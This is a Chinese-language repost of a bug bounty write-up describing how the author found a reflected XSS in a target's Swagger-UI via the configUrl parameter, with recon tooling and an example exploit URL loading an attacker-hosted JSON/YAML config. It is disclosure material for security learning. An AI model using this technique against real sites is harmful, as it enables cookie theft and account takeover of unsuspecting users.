Swagger-UI 反射型 XSS导致帐户接管

admin 2024年5月23日15:02:59评论15 views字数 1717阅读5分43秒阅读模式
 

>世界你好!

你好,触摸上的 scr1pty!我是一名安全人员,决定一次改变自己的生活,并将我的职业生涯从安全管理转向道德黑客。我全职进行渗透测试,但在空闲时间我会寻找错误。这是我的第一篇博文,希望您会觉得它有趣。这篇文章介绍了我如何在 Swagger-UI 中发现反射型 XSS,从而导致帐户接管。

>侦察阶段

由于每个黑客都有自己的侦察方法,我也有自己的侦察方法[顺便说一句,如果你想要单独发一篇关于侦察的帖子,请发表评论]。

这是一个简单的 bash 脚本,可以自动执行 assetfinder、subfinder 来搜索子域,以及 httpx 工具来探测活动资产。我的下一步总是使用 nuclei-templates,尤其是 nuclei-templates/http/technologies。

同时,我使用 Wappalyzer 打开所有子域 URL,以手动拾取容易发现的错误(如果有的话)。

经过一小时的原子核扫描(因为我通常使用大型示波器),我在目标上找到了 Swagger-UI 路径:

https://redacted.com/swagger-ui/

我开始研究 Swagger 是否存在漏洞,并立即尝试使用 curl 发送任何经过身份验证的 API 请求,但无需身份验证。我希望可能存在配置错误,允许在未经身份验证的情况下访问用户数据或其他敏感文件。不幸的是,这没有奏效,但经过几个小时的研究,我偶然发现了以下文章:

  • 黑客 Swagger-UI:从 XSS 到帐户接管
    https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/
  • 我如何通过 Swagger-UI DOM XSS 窃取用户的凭据
    https://medium.com/@AlQa3Qa3_M0X0101/how-i-was-able-to-steal-users-credentials-via-swagger-ui-dom-xss-e84255eb8c96

>利用理念

这个想法是创建两个公开可用的文件(在上述参考文献中查找模板):

  • scripty.json:这是一个 .json 文件,作为 .json 扩展名中接受的 Swagger-UI 配置文件。此 .json 文件指的是我们的第二个 .yaml 文件。
  • scripty.yaml:此 .yaml 文件包含用 JavaScript 编写的 XSS 有效负载。我用于 PoC 的有效负载会使用 document.cookie 触发弹出警报。

提示如下:如果您不想使用漏洞文件托管您的服务器 — — 只需将它们上传到您的 GitHub 存储库并使用原始链接。

>利用目标

现在我们准备好利用我们的目标(如果它容易受到攻击)。我们需要通过目标路径在“configUrl”或“url”参数中输入 .json 文件的链接:

https://redacted.com/swagger-ui/index.html?configUrl=

看看会发生什么:

https://redacted.com/swagger-ui/index.html?configUrl=https://raw.githubusercontent.com/YourProfile/swaggersploit/main/YourJsonFile.json

Swagger-UI 反射型 XSS导致帐户接管

当受害者访问上述 URL 时,XSS 负载就会被执行,从而触发一个弹出窗口,该窗口可以捕获受害者的 cookie 并将其发送给攻击者。

>结果

如图所示,有效负载当前会触发弹出窗口以进行证明。修改此有效负载可能允许攻击者捕获会话令牌或 cookie,从而实现对受害者帐户的未经授权的访问,包括管理员权限(如果会话属于管理用户)。

Swagger-UI XSS Leading to Account Takeover on Crypto Exchangehttps://scr1pty.medium.com/how-i-found-xss-in-swagger-ui-leading-to-account-takeover-on-bug-bounty-8d419c6b95d5

原文始发于微信公众号(Ots安全):Swagger-UI 反射型 XSS导致帐户接管

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月23日15:02:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Swagger-UI 反射型 XSS导致帐户接管http://cn-sec.com/archives/2769905.html

发表评论

匿名网友 填写信息